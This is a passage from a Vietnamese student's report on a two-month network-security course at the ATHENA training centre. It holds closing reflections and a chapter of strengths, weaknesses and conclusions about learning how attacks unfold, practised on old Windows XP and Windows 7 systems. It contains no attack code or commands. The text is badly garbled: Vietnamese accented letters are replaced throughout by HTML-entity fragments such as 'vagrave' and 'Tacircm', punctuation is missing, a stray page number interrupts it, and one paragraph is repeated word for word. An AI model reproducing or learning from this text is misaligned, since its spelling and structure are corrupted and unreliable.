Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp